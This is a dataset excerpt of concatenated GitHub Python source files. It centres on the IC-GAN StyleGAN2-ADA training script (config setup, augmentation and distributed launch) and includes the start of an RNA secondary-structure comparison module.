Game()\ngame_play.play_round()\n\n\n\n","repo_name":"natebc72/Team-10-Repo","sub_path":"jumper_jer.py","file_name":"jumper_jer.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13797775116","text":"import sys\nimport os\n\nsys.path.insert(1, os.path.join(sys.path[0], \"..\"))\nimport click\nimport re\nimport json\nimport tempfile\nimport torch\nimport dnnlib\n\nimport numpy as np\n\nimport parser\n\nfrom training import training_loop\nfrom metrics import metric_main\nfrom torch_utils import training_stats\nfrom torch_utils import custom_ops\n\n\n# ----------------------------------------------------------------------------\n\n\nclass UserError(Exception):\n pass\n\n\n# ----------------------------------------------------------------------------\n\n\ndef setup_training_loop_kwargs(\n # General options (not included in desc).\n exp_name=None, # Experiment name\n slurm=None, # Using SLURM or not \n gpus=None, # Number of GPUs: , default = 1 gpu\n nodes=None, # Number of nodes: , default = 1 node\n snap=None, # Snapshot interval: , default = 50 ticks\n metrics=None, # List of metric names: [], ['fid50k_full'] (default), ...\n seed=None, # Random seed: , default = 0\n # Dataset.\n data=None, # Training dataset (required): \n class_cond=None, # Conditioning on a class label \n subset=None, # Train with only N images: , default = all\n mirror=None, # Augment dataset with x-flips: , default = False\n # IC-GAN dataset parameters.\n instance_cond=None, # Conditioning on instance features \n feature_augmentation=None, # Horizontal flips augmentation to extract instance features \n root_feats=None, # Path where to find the hdf5 file with the instance features \n root_nns=None, # Path where to find the pre-computed nearest neighbors for each instance \n label_dim=None, # Dimensionality of the class embeddings if we use class conditonings .\n # Base config.\n cfg=None, # Base config: 'auto' (default), 'stylegan2', 'paper256', 'paper512', 'paper1024', 'cifar'\n lrate=None, # Override learning rate: \n gamma=None, # Override R1 gamma: \n kimg=None, # Override training duration: \n batch=None, # Override batch size: \n num_channel_g=None, # Override width of generator network: \n num_channel_d=None, # Override width of discriminator network: \n channel_max_g=None, # Override max width of generator network: \n channel_max_d=None, # Override max width of discriminator network: \n hidden_dim_c=None, # Override embedding dimensionality for class conditioning inside mapping network\n hidden_dim_h=None, # Override embedding dimensionality for instance conditioning inside mapping network\n es_patience=None, # Early stopping patience in number of seen images: \n # Discriminator augmentation.\n aug=None, # Augmentation mode: 'ada' (default), 'noaug', 'fixed'\n p=None, # Specify p for 'fixed' (required): \n target=None, # Override ADA target for 'ada': , default = depends on aug\n augpipe=None, # Augmentation pipeline: 'blit', 'geom', 'color', 'filter', 'noise', 'cutout', 'bg', 'bgc' (default), ..., 'bgcfnc'\n # Transfer learning.\n resume=None, # Load previous network: 'noresume' (default), 'ffhq256', 'ffhq512', 'ffhq1024', 'celebahq256', 'lsundog256', , \n freezed=None, # Freeze-D: , default = 0 discriminator layers\n # Performance options (not included in desc).\n fp32=None, # Disable mixed-precision training: , default = False\n nhwc=None, # Use NHWC memory format with FP16: , default = False\n allow_tf32=None, # Allow PyTorch to use TF32 for matmul and convolutions: , default = False\n nobench=None, # Disable cuDNN benchmarking: , default = False\n workers=None, # Override number of DataLoader workers: , default = 3\n **kwargs,\n):\n args = dnnlib.EasyDict()\n\n # ------------------------------------------\n # General options: gpus, snap, metrics, seed\n # ------------------------------------------\n\n if gpus is None:\n gpus = 1\n assert isinstance(gpus, int)\n if not (gpus >= 1 and gpus & (gpus - 1) == 0):\n raise UserError(\"--gpus must be a power of two\")\n args.num_gpus = gpus * nodes\n\n if snap is None:\n snap = 50\n assert isinstance(snap, int)\n if snap < 1:\n raise UserError(\"--snap must be at least 1\")\n args.image_snapshot_ticks = snap\n args.network_snapshot_ticks = snap\n args.es_patience = es_patience\n\n if metrics is None:\n metrics = [\"fid50k_full\"]\n assert isinstance(metrics, list)\n if not all(metric_main.is_valid_metric(metric) for metric in metrics):\n raise UserError(\n \"\\n\".join(\n [\"--metrics can only contain the following values:\"]\n + metric_main.list_valid_metrics()\n )\n )\n args.metrics = metrics\n\n if seed is None:\n seed = 0\n assert isinstance(seed, int)\n args.random_seed = seed\n\n # -----------------------------------\n # Dataset: data, cond, subset, mirror\n # -----------------------------------\n\n assert data is not None\n assert isinstance(data, str)\n\n class_name = \"data_utils.datasets_common.ILSVRC_HDF5_feats\"\n args.class_cond = class_cond\n args.instance_cond = instance_cond\n\n if mirror is None:\n mirror = False\n assert isinstance(mirror, bool)\n\n args.training_set_kwargs = dnnlib.EasyDict(\n class_name=class_name,\n root=data,\n max_size=None,\n xflip=False,\n load_labels=class_cond,\n load_features=instance_cond,\n root_feats=root_feats,\n root_nns=root_nns,\n transform=None,\n label_dim=label_dim,\n feature_dim=2048,\n apply_norm=False,\n label_onehot=True,\n feature_augmentation=feature_augmentation,\n )\n args.data_loader_kwargs = dnnlib.EasyDict(\n pin_memory=True, num_workers=3, prefetch_factor=2\n )\n try:\n training_set = dnnlib.util.construct_class_by_name(\n **args.training_set_kwargs\n ) # subclass of training.dataset.Dataset\n args.training_set_kwargs.resolution = (\n training_set.resolution\n ) # be explicit about resolution\n args.training_set_kwargs.load_labels = class_cond\n args.training_set_kwargs.max_size = len(\n training_set\n ) # be explicit about dataset size\n desc = os.path.splitext(os.path.basename(data))[0]\n del training_set # conserve memory\n except IOError as err:\n raise UserError(f\"--data: {err}\")\n\n if mirror:\n desc += \"-mirror\"\n args.training_set_kwargs.xflip = True\n\n # if load_labels:\n # if not args.training_set_kwargs.load_labels:\n # raise UserError('--cond=True requires labels specified in dataset.json')\n # desc += '-cond'\n # else:\n # args.training_set_kwargs.load_labels = False\n # if load_features and not load_labels:\n # args.training_set_kwargs.label_dim=2048\n\n if subset is not None:\n assert isinstance(subset, int)\n if not 1 <= subset <= args.training_set_kwargs.max_size:\n raise UserError(\n f\"--subset must be between 1 and {args.training_set_kwargs.max_size}\"\n )\n desc += f\"-subset{subset}\"\n if subset < args.training_set_kwargs.max_size:\n args.training_set_kwargs.max_size = subset\n args.training_set_kwargs.random_seed = args.random_seed\n\n # ------------------------------------\n # Base config: cfg, gamma, kimg, batch\n # ------------------------------------\n\n if cfg is None:\n cfg = \"auto\"\n assert isinstance(cfg, str)\n desc += f\"-{cfg}\"\n\n cfg_specs = {\n \"auto\": dict(\n ref_gpus=-1,\n kimg=25000,\n mb=-1,\n mbstd=-1,\n fmaps=-1,\n lrate=-1,\n gamma=-1,\n ema=-1,\n ramp=0.05,\n map=2,\n ), # Populated dynamically based on resolution and GPU count.\n \"stylegan2\": dict(\n ref_gpus=8,\n kimg=25000,\n mb=32,\n mbstd=4,\n fmaps=1,\n lrate=0.002,\n gamma=10,\n ema=10,\n ramp=None,\n map=8,\n ), # Uses mixed-precision, unlike the original StyleGAN2.\n \"paper256\": dict(\n ref_gpus=8,\n kimg=25000,\n mb=64,\n mbstd=8,\n fmaps=0.5,\n lrate=0.0025,\n gamma=1,\n ema=20,\n ramp=None,\n map=8,\n ),\n \"paper512\": dict(\n ref_gpus=8,\n kimg=25000,\n mb=64,\n mbstd=8,\n fmaps=1,\n lrate=0.0025,\n gamma=0.5,\n ema=20,\n ramp=None,\n map=8,\n ),\n \"paper1024\": dict(\n ref_gpus=8,\n kimg=25000,\n mb=32,\n mbstd=4,\n fmaps=1,\n lrate=0.002,\n gamma=2,\n ema=10,\n ramp=None,\n map=8,\n ),\n \"cifar\": dict(\n ref_gpus=2,\n kimg=100000,\n mb=64,\n mbstd=32,\n fmaps=1,\n lrate=0.0025,\n gamma=0.01,\n ema=500,\n ramp=0.05,\n map=2,\n ),\n }\n\n assert cfg in cfg_specs\n spec = dnnlib.EasyDict(cfg_specs[cfg])\n if cfg == \"auto\":\n desc += f\"{gpus:d}\"\n spec.ref_gpus = args.num_gpus\n res = args.training_set_kwargs.resolution\n spec.mb = max(\n min(args.num_gpus * min(4096 // res, 32), 64), args.num_gpus\n ) # keep gpu memory consumption at bay\n spec.mbstd = min(\n spec.mb // args.num_gpus, 4\n ) # other hyperparams behave more predictably if mbstd group size remains fixed\n spec.fmaps = 1 if res >= 512 else 0.5\n spec.lrate = 0.002 if res >= 1024 else 0.0025\n spec.gamma = 0.0002 * (res ** 2) / spec.mb # heuristic formula\n spec.ema = spec.mb * 10 / 32\n\n args.G_kwargs = dnnlib.EasyDict(\n class_name=\"training.networks.Generator\",\n z_dim=512,\n w_dim=512,\n mapping_kwargs=dnnlib.EasyDict(),\n synthesis_kwargs=dnnlib.EasyDict(),\n )\n args.D_kwargs = dnnlib.EasyDict(\n class_name=\"training.networks.Discriminator\",\n block_kwargs=dnnlib.EasyDict(),\n mapping_kwargs=dnnlib.EasyDict(),\n epilogue_kwargs=dnnlib.EasyDict(),\n )\n args.G_kwargs.synthesis_kwargs.channel_base = args.D_kwargs.channel_base = int(\n spec.fmaps * 32768\n )\n args.G_kwargs.synthesis_kwargs.channel_max = args.D_kwargs.channel_max = 512\n args.G_kwargs.mapping_kwargs.num_layers = spec.map\n if hidden_dim_c is not None:\n args.G_kwargs.mapping_kwargs.embed_features = hidden_dim_c\n args.D_kwargs.mapping_kwargs.embed_features = hidden_dim_c\n if hidden_dim_h is not None:\n args.G_kwargs.mapping_kwargs.embed_features_feat = hidden_dim_h\n args.D_kwargs.mapping_kwargs.embed_features_feat = hidden_dim_h\n args.G_kwargs.synthesis_kwargs.num_fp16_res = (\n args.D_kwargs.num_fp16_res\n ) = 4 # enable mixed-precision training\n args.G_kwargs.synthesis_kwargs.conv_clamp = (\n args.D_kwargs.conv_clamp\n ) = 256 # clamp activations to avoid float16 overflow\n args.D_kwargs.epilogue_kwargs.mbstd_group_size = spec.mbstd\n\n args.exp_name = exp_name\n if num_channel_d is not None:\n args.D_kwargs.channel_base = num_channel_d\n if channel_max_d is not None:\n args.D_kwargs.channel_max = channel_max_d\n if num_channel_g is not None:\n args.G_kwargs.synthesis_kwargs.channel_base = num_channel_g\n if channel_max_g is not None:\n args.G_kwargs.synthesis_kwargs.channel_max = channel_max_g\n\n if lrate is not None:\n spec.lrate = lrate\n\n args.G_opt_kwargs = dnnlib.EasyDict(\n class_name=\"torch.optim.Adam\", lr=spec.lrate, betas=[0, 0.99], eps=1e-8\n )\n args.D_opt_kwargs = dnnlib.EasyDict(\n class_name=\"torch.optim.Adam\", lr=spec.lrate, betas=[0, 0.99], eps=1e-8\n )\n args.loss_kwargs = dnnlib.EasyDict(\n class_name=\"training.loss.StyleGAN2Loss\", r1_gamma=spec.gamma\n )\n\n args.total_kimg = spec.kimg\n args.batch_size = spec.mb\n args.batch_gpu = spec.mb // spec.ref_gpus\n args.ema_kimg = spec.ema\n args.ema_rampup = spec.ramp\n\n if cfg == \"cifar\":\n args.loss_kwargs.pl_weight = 0 # disable path length regularization\n args.loss_kwargs.style_mixing_prob = 0 # disable style mixing\n args.D_kwargs.architecture = \"orig\" # disable residual skip connections\n\n if gamma is not None:\n assert isinstance(gamma, float)\n if not gamma >= 0:\n raise UserError(\"--gamma must be non-negative\")\n desc += f\"-gamma{gamma:g}\"\n args.loss_kwargs.r1_gamma = gamma\n\n if kimg is not None:\n assert isinstance(kimg, int)\n if not kimg >= 1:\n raise UserError(\"--kimg must be at least 1\")\n desc += f\"-kimg{kimg:d}\"\n args.total_kimg = kimg\n\n if batch is not None:\n assert isinstance(batch, int)\n if not (batch >= 1 and batch % args.num_gpus == 0):\n raise UserError(\n \"--batch must be at least 1 and divisible by --gpus and --nodes\"\n )\n desc += f\"-batch{batch}\"\n args.batch_size = batch\n args.batch_gpu = batch // (args.num_gpus)\n args.slurm = slurm\n\n # ---------------------------------------------------\n # Discriminator augmentation: aug, p, target, augpipe\n # ---------------------------------------------------\n\n if aug is None:\n aug = \"ada\"\n else:\n assert isinstance(aug, str)\n desc += f\"-{aug}\"\n\n if aug == \"ada\":\n args.ada_target = 0.6\n\n elif aug == \"noaug\":\n pass\n\n elif aug == \"fixed\":\n if p is None:\n raise UserError(f\"--aug={aug} requires specifying --p\")\n\n else:\n raise UserError(f\"--aug={aug} not supported\")\n\n if p is not None:\n assert isinstance(p, float)\n if aug != \"fixed\":\n raise UserError(\"--p can only be specified with --aug=fixed\")\n if not 0 <= p <= 1:\n raise UserError(\"--p must be between 0 and 1\")\n desc += f\"-p{p:g}\"\n args.augment_p = p\n\n if target is not None:\n assert isinstance(target, float)\n if aug != \"ada\":\n raise UserError(\"--target can only be specified with --aug=ada\")\n if not 0 <= target <= 1:\n raise UserError(\"--target must be between 0 and 1\")\n desc += f\"-target{target:g}\"\n args.ada_target = target\n\n assert augpipe is None or isinstance(augpipe, str)\n if augpipe is None:\n augpipe = \"bgc\"\n else:\n if aug == \"noaug\":\n raise UserError(\"--augpipe cannot be specified with --aug=noaug\")\n desc += f\"-{augpipe}\"\n\n augpipe_specs = {\n \"blit\": dict(xflip=1, rotate90=1, xint=1),\n \"geom\": dict(scale=1, rotate=1, aniso=1, xfrac=1),\n \"color\": dict(brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1),\n \"filter\": dict(imgfilter=1),\n \"noise\": dict(noise=1),\n \"cutout\": dict(cutout=1),\n \"bg\": dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1),\n \"bgc\": dict(\n xflip=1,\n rotate90=1,\n xint=1,\n scale=1,\n rotate=1,\n aniso=1,\n xfrac=1,\n brightness=1,\n contrast=1,\n lumaflip=1,\n hue=1,\n saturation=1,\n ),\n \"bgcf\": dict(\n xflip=1,\n rotate90=1,\n xint=1,\n scale=1,\n rotate=1,\n aniso=1,\n xfrac=1,\n brightness=1,\n contrast=1,\n lumaflip=1,\n hue=1,\n saturation=1,\n imgfilter=1,\n ),\n \"bgcfn\": dict(\n xflip=1,\n rotate90=1,\n xint=1,\n scale=1,\n rotate=1,\n aniso=1,\n xfrac=1,\n brightness=1,\n contrast=1,\n lumaflip=1,\n hue=1,\n saturation=1,\n imgfilter=1,\n noise=1,\n ),\n \"bgcfnc\": dict(\n xflip=1,\n rotate90=1,\n xint=1,\n scale=1,\n rotate=1,\n aniso=1,\n xfrac=1,\n brightness=1,\n contrast=1,\n lumaflip=1,\n hue=1,\n saturation=1,\n imgfilter=1,\n noise=1,\n cutout=1,\n ),\n }\n\n assert augpipe in augpipe_specs\n if aug != \"noaug\":\n args.augment_kwargs = dnnlib.EasyDict(\n class_name=\"training.augment.AugmentPipe\", **augpipe_specs[augpipe]\n )\n\n # ----------------------------------\n # Transfer learning: resume, freezed\n # ----------------------------------\n\n resume_specs = {\n \"ffhq256\": \"https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res256-mirror-paper256-noaug.pkl\",\n \"ffhq512\": \"https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res512-mirror-stylegan2-noaug.pkl\",\n \"ffhq1024\": \"https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res1024-mirror-stylegan2-noaug.pkl\",\n \"celebahq256\": \"https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/celebahq-res256-mirror-paper256-kimg100000-ada-target0.5.pkl\",\n \"lsundog256\": \"https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/lsundog-res256-paper256-kimg100000-noaug.pkl\",\n }\n\n assert resume is None or isinstance(resume, str)\n if resume is None:\n resume = \"noresume\"\n elif resume == \"noresume\":\n desc += \"-noresume\"\n elif resume in resume_specs:\n desc += f\"-resume{resume}\"\n args.resume_pkl = resume_specs[resume] # predefined url\n else:\n desc += \"-resumecustom\"\n args.resume_pkl = resume # custom path or url\n\n if resume != \"noresume\":\n args.ada_kimg = 100 # make ADA react faster at the beginning\n args.ema_rampup = None # disable EMA rampup\n\n if freezed is not None:\n assert isinstance(freezed, int)\n if not freezed >= 0:\n raise UserError(\"--freezed must be non-negative\")\n desc += f\"-freezed{freezed:d}\"\n args.D_kwargs.block_kwargs.freeze_layers = freezed\n\n # -------------------------------------------------\n # Performance options: fp32, nhwc, nobench, workers\n # -------------------------------------------------\n\n if fp32 is None:\n fp32 = False\n assert isinstance(fp32, bool)\n if fp32:\n args.G_kwargs.synthesis_kwargs.num_fp16_res = args.D_kwargs.num_fp16_res = 0\n args.G_kwargs.synthesis_kwargs.conv_clamp = args.D_kwargs.conv_clamp = None\n\n if nhwc is None:\n nhwc = False\n assert isinstance(nhwc, bool)\n if nhwc:\n args.G_kwargs.synthesis_kwargs.fp16_channels_last = (\n args.D_kwargs.block_kwargs.fp16_channels_last\n ) = True\n\n if nobench is None:\n nobench = False\n assert isinstance(nobench, bool)\n if nobench:\n args.cudnn_benchmark = False\n\n if allow_tf32 is None:\n allow_tf32 = False\n assert isinstance(allow_tf32, bool)\n if allow_tf32:\n args.allow_tf32 = True\n\n if workers is not None:\n assert isinstance(workers, int)\n if not workers >= 1:\n raise UserError(\"--workers must be at least 1\")\n args.data_loader_kwargs.num_workers = workers\n\n return desc, args\n\n\n# ----------------------------------------------------------------------------\n\n\ndef subprocess_fn(rank, args, world_size=1, dist_url=\"\", temp_dir=\"\", slurm=False):\n dnnlib.util.Logger(\n file_name=os.path.join(args.run_dir, \"log.txt\"),\n file_mode=\"a\",\n should_flush=True,\n )\n\n # Init torch.distributed.\n if not slurm and args.num_gpus > 1:\n init_file = os.path.abspath(os.path.join(temp_dir, \".torch_distributed_init\"))\n if os.name == \"nt\":\n init_method = \"file:///\" + init_file.replace(\"\\\\\", \"/\")\n torch.distributed.init_process_group(\n backend=\"gloo\",\n init_method=init_method,\n rank=rank,\n world_size=args.num_gpus,\n )\n else:\n init_method = f\"file://{init_file}\"\n torch.distributed.init_process_group(\n backend=\"nccl\",\n init_method=init_method,\n rank=rank,\n world_size=args.num_gpus,\n )\n # Init torch_utils.\n sync_device = torch.device(\"cuda\", rank) if args.num_gpus > 1 else None\n training_stats.init_multiprocessing(rank=rank, sync_device=sync_device)\n local_rank = rank\n\n elif slurm:\n rank = int(os.environ.get(\"SLURM_PROCID\"))\n local_rank = int(os.environ.get(\"SLURM_LOCALID\"))\n torch.distributed.init_process_group(\n backend=\"nccl\", init_method=dist_url, rank=rank, world_size=world_size\n )\n else:\n rank = local_rank = 0\n\n if rank != 0:\n custom_ops.verbosity = \"none\"\n\n # Execute training loop.\n training_loop.training_loop(\n rank=rank, local_rank=local_rank, temp_dir=temp_dir, **args\n )\n\n\n# ----------------------------------------------------------------------------\n\n\nclass CommaSeparatedList(click.ParamType):\n name = \"list\"\n\n def convert(self, value, param, ctx):\n _ = param, ctx\n if value is None or value.lower() == \"none\" or value == \"\":\n return []\n return value.split(\",\")\n\n\n# ----------------------------------------------------------------------------\n\n\ndef main(args, outdir, master_node=\"\", port=40000, dry_run=False, **config_kwargs):\n \"\"\"Train a GAN using the techniques described in the paper\n \"Training Generative Adversarial Networks with Limited Data\".\n\n Examples:\n\n \\b\n # Train with custom dataset using 1 GPU.\n python train.py --outdir=~/training-runs --data=~/mydataset.zip --gpus=1\n\n \\b\n # Train class-conditional CIFAR-10 using 2 GPUs.\n python train.py --outdir=~/training-runs --data=~/datasets/cifar10.zip \\\\\n --gpus=2 --cfg=cifar --cond=1\n\n \\b\n # Transfer learn MetFaces from FFHQ using 4 GPUs.\n python train.py --outdir=~/training-runs --data=~/datasets/metfaces.zip \\\\\n --gpus=4 --cfg=paper1024 --mirror=1 --resume=ffhq1024 --snap=10\n\n \\b\n # Reproduce original StyleGAN2 config F.\n python train.py --outdir=~/training-runs --data=~/datasets/ffhq.zip \\\\\n --gpus=8 --cfg=stylegan2 --mirror=1 --aug=noaug\n\n \\b\n Base configs (--cfg):\n auto Automatically select reasonable defaults based on resolution\n and GPU count. Good starting point for new datasets.\n stylegan2 Reproduce results for StyleGAN2 config F at 1024x1024.\n paper256 Reproduce results for FFHQ and LSUN Cat at 256x256.\n paper512 Reproduce results for BreCaHAD and AFHQ at 512x512.\n paper1024 Reproduce results for MetFaces at 1024x1024.\n cifar Reproduce results for CIFAR-10 at 32x32.\n\n \\b\n Transfer learning source networks (--resume):\n ffhq256 FFHQ trained at 256x256 resolution.\n ffhq512 FFHQ trained at 512x512 resolution.\n ffhq1024 FFHQ trained at 1024x1024 resolution.\n celebahq256 CelebA-HQ trained at 256x256 resolution.\n lsundog256 LSUN Dog trained at 256x256 resolution.\n Custom network pickle.\n \"\"\"\n dnnlib.util.Logger(should_flush=True)\n\n # Setup training options.\n config_kwargs = vars(args)\n run_desc, args = setup_training_loop_kwargs(**config_kwargs)\n args.metrics = [\"fid50k_full\"]\n\n if args.exp_name is None:\n # Pick output directory.\n prev_run_dirs = []\n if os.path.isdir(outdir):\n prev_run_dirs = [\n x for x in os.listdir(outdir) if os.path.isdir(os.path.join(outdir, x))\n ]\n prev_run_ids = [re.match(r\"^\\d+\", x) for x in prev_run_dirs]\n prev_run_ids = [int(x.group()) for x in prev_run_ids if x is not None]\n cur_run_id = max(prev_run_ids, default=-1) + 1\n args.run_dir = os.path.join(outdir, f\"{cur_run_id:05d}-{run_desc}\")\n assert not os.path.exists(args.run_dir)\n else:\n args.run_dir = os.path.join(outdir, args.exp_name)\n\n # Print options.\n print()\n print(\"Training options:\")\n # print(json.dumps(args, indent=2))\n print()\n print(f\"Output directory: {args.run_dir}\")\n print(f\"Training data: {args.training_set_kwargs.root}\")\n print(f\"Training duration: {args.total_kimg} kimg\")\n print(f\"Number of GPUs: {args.num_gpus}\")\n print(f\"Number of images: {args.training_set_kwargs.max_size}\")\n print(f\"Image resolution: {args.training_set_kwargs.resolution}\")\n print(f\"Conditional model: {args.training_set_kwargs.load_labels}\")\n print(f\"Dataset x-flips: {args.training_set_kwargs.xflip}\")\n print()\n\n # Dry run?\n if dry_run:\n print(\"Dry run; exiting.\")\n return\n\n # Create output directory.\n print(\"Creating output directory...\")\n if not os.path.exists(args.run_dir):\n os.makedirs(args.run_dir, exist_ok=True)\n with open(os.path.join(args.run_dir, \"training_options.json\"), \"wt\") as f:\n json.dump(args, f, indent=2)\n\n ## Multi-gpu or multi-node training ##\n if args.slurm:\n n_nodes = int(os.environ.get(\"SLURM_JOB_NUM_NODES\"))\n n_gpus_per_node = int(os.environ.get(\"SLURM_TASKS_PER_NODE\").split(\"(\")[0])\n world_size = n_gpus_per_node * n_nodes\n dist_url = \"tcp://\"\n dist_url += master_node\n dist_url += \":\" + str(port)\n print(\"Dist url \", dist_url)\n temp_dir = \"/scratch/slurm_tmpdir/\" + str(os.environ.get(\"SLURM_JOB_ID\"))\n subprocess_fn(\n rank=-1,\n args=args,\n world_size=world_size,\n dist_url=dist_url,\n temp_dir=temp_dir,\n slurm=args.slurm,\n )\n else:\n # Launch processes.\n print(\"Launching processes...\")\n torch.multiprocessing.set_start_method(\"spawn\")\n with tempfile.TemporaryDirectory() as temp_dir:\n if args.num_gpus == 1:\n subprocess_fn(rank=0, args=args, temp_dir=temp_dir)\n else:\n torch.multiprocessing.spawn(\n fn=subprocess_fn,\n args=(args, args.num_gpus, \"\", temp_dir),\n nprocs=args.num_gpus,\n )\n\n\n# ----------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n parser_ = parser.get_parser()\n args = parser_.parse_args()\n main(args) # pylint: disable=no-value-for-parameter\n\n# ----------------------------------------------------------------------------\n","repo_name":"facebookresearch/ic_gan","sub_path":"stylegan2_ada_pytorch/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":27218,"program_lang":"python","lang":"en","doc_type":"code","stars":525,"dataset":"github-code","pt":"47"} +{"seq_id":"21343712006","text":"import sys\nsys.path.append('/switchfinder/')\n\n\nimport SwitchFinder.dotbracket_comparisons as dotbracket_comparisons\nimport SwitchFinder.glob_vars as glob_vars\nimport SwitchFinder.utils as utils\nimport SwitchFinder.check_base_pairing as check_base_pairing\nimport textwrap\nimport numpy as np\nimport copy\n\n\nclass fragment_collection:\n def __init__(self):\n self.body_dict = {}\n\n def identify_stretches(self,\n MAX_SPACING = 1,\n MIN_STEM_LENGHT = 3,\n MAXIMAL_OVERHANG = 2\n ):\n for i in self.body_dict:\n self.body_dict[i].identify_stretches(MAX_SPACING, MIN_STEM_LENGHT, MAXIMAL_OVERHANG)\n self.body_dict[i].convert_to_numpy()\n\n\n def remove_outer_stretches(self):\n for i in self.body_dict:\n self.body_dict[i].remove_outer_stretches()\n\n\n def print(self, num_to_print = 2, width = 91,\n show_changing_structures = True,\n show_unchanged_structures=True,\n show_inner_stems = False,\n show_outer_stems = False,\n do_return = True\n ):\n all_fragments_names = sorted(list(self.body_dict.keys()))\n strings_to_print_list = []\n strings_to_print_list.append(\"Printing %d first fragments as specified\\n\" % num_to_print)\n if not do_return:\n print(\"\\n\".join(strings_to_print_list))\n strings_to_print_list = []\n for i in range(num_to_print):\n fr_string = self.body_dict[all_fragments_names[i]].print(\n show_changing_structures,\n show_unchanged_structures,\n show_inner_stems,\n show_outer_stems,\n width=width,\n do_return = do_return\n )\n strings_to_print_list.append(fr_string)\n if do_return:\n return \"\\n\".join(strings_to_print_list)\n\n\nclass fragment:\n def __init__(self):\n self.name = ''\n self.major_conf = conformation()\n self.second_conf = conformation()\n self.common_conf = conformation()\n self.sequence = ''\n self.changing_loops_mask = None\n self.A_C_mask = None\n\n def identify_stretches(self, MAX_SPACING = 1, MIN_STEM_LENGHT = 3, MAXIMAL_OVERHANG = 2):\n self.major_conf.get_all_basepair_stretches()\n self.second_conf.get_all_basepair_stretches()\n\n self.major_conf.combine_parts_of_the_same_stretch_together(MAX_SPACING)\n self.second_conf.combine_parts_of_the_same_stretch_together(MAX_SPACING)\n\n unchanged_stretches_major, \\\n changed_stretches_major, \\\n unchanged_stretches_second, \\\n changed_stretches_second = dotbracket_comparisons.remove_changing_parts_both_conformations(\n self.major_conf.stretches_with_spaces, self.second_conf.stretches_with_spaces,\n self.major_conf.string, self.second_conf.string,\n MAXIMAL_OVERHANG = MAXIMAL_OVERHANG\n )\n self.major_conf.changed_stretches = changed_stretches_major\n self.major_conf.unchanged_stretches = unchanged_stretches_major\n self.second_conf.changed_stretches = changed_stretches_second\n self.second_conf.unchanged_stretches = unchanged_stretches_second\n\n self.major_conf.changed_stretches_no_short = dotbracket_comparisons.remove_short_changing_stems(\n self.major_conf.changed_stretches, MIN_STEM_LENGHT = MIN_STEM_LENGHT\n )\n self.second_conf.changed_stretches_no_short = dotbracket_comparisons.remove_short_changing_stems(\n self.second_conf.changed_stretches, MIN_STEM_LENGHT = MIN_STEM_LENGHT\n )\n\n def remove_outer_stretches(self):\n no_outer_stretches = dotbracket_comparisons.remove_all_outer_stems(self.major_conf.unchanged_stretches,\n self.major_conf.changed_stretches,\n self.second_conf.changed_stretches)\n self.major_conf.no_outer_stretches = no_outer_stretches\n self.second_conf.no_outer_stretches = no_outer_stretches\n\n outer_stretches_only = dotbracket_comparisons.two_stretches_difference(self.major_conf.unchanged_stretches,\n self.major_conf.no_outer_stretches)\n\n self.major_conf.outer_stretches = outer_stretches_only\n self.second_conf.outer_stretches = outer_stretches_only\n\n inner_stretches_unchanged = dotbracket_comparisons.two_stretches_difference(self.major_conf.unchanged_stretches,\n self.major_conf.outer_stretches)\n\n self.major_conf.unchanged_inner_stretches = inner_stretches_unchanged\n self.second_conf.unchanged_inner_stretches = inner_stretches_unchanged\n\n def initialize_pairing_states(self):\n self.major_conf.get_pairing_states()\n self.second_conf.get_pairing_states()\n\n\n def get_differential_pairing_states(self):\n if self.major_conf.pairing_states is None or \\\n self.second_conf.pairing_states is None:\n self.initialize_pairing_states()\n\n diff_unpaired_1, diff_unpaired_2 = dotbracket_comparisons.identify_differentially_paired_positions(\n self.major_conf.pairing_states, self.second_conf.pairing_states)\n self.major_conf.differentially_unpaired_states = diff_unpaired_1\n self.second_conf.differentially_unpaired_states = diff_unpaired_2\n\n\n def get_constant_pairing_states(self):\n constantly_paired_positions, constantly_unpaired_positions = dotbracket_comparisons.identify_constantly_paired_positions(\n self.major_conf.pairing_states, self.second_conf.pairing_states)\n self.major_conf.constantly_paired_positions = constantly_paired_positions\n self.second_conf.constantly_paired_positions = constantly_paired_positions\n self.major_conf.constantly_unpaired_positions = constantly_unpaired_positions\n self.second_conf.constantly_unpaired_positions = constantly_unpaired_positions\n\n\n def get_differential_pairing_states_within_loops(self):\n self.get_differential_pairing_states()\n self.make_mask_of_differential_intervals()\n self.major_conf.differentially_unpaired_states_within_loops = np.logical_and(\n self.major_conf.differentially_unpaired_states,\n self.changing_loops_mask)\n self.second_conf.differentially_unpaired_states_within_loops = np.logical_and(\n self.second_conf.differentially_unpaired_states,\n self.changing_loops_mask)\n\n def get_differential_ACs(self):\n self.get_differential_pairing_states_within_loops()\n self.get_AC_mask()\n self.get_constant_pairing_states()\n self.major_conf.differentially_unpaired_ACs = np.logical_and(\n self.major_conf.differentially_unpaired_states_within_loops,\n self.A_C_mask)\n self.second_conf.differentially_unpaired_ACs = np.logical_and(\n self.second_conf.differentially_unpaired_states_within_loops,\n self.A_C_mask)\n self.major_conf.constant_paired_ACs = np.logical_and(self.major_conf.constantly_paired_positions,\n self.A_C_mask)\n self.major_conf.constant_unpaired_ACs = np.logical_and(self.major_conf.constantly_unpaired_positions,\n self.A_C_mask)\n self.second_conf.constant_paired_ACs = self.major_conf.constant_paired_ACs\n self.second_conf.constant_unpaired_ACs = self.major_conf.constant_unpaired_ACs\n\n\n def get_differential_intervals(self):\n all_changing_stretches = np.concatenate((\n self.major_conf.changed_stretches_no_short,\n self.second_conf.changed_stretches_no_short),\n axis=0)\n left_halves = all_changing_stretches[:, 0:2]\n right_halves = all_changing_stretches[:, 2:4]\n all_changing_intervals = np.concatenate((left_halves, right_halves), axis=0)\n all_changing_intervals = np.sort(all_changing_intervals, axis=0)\n all_changing_intervals[:, 1] += 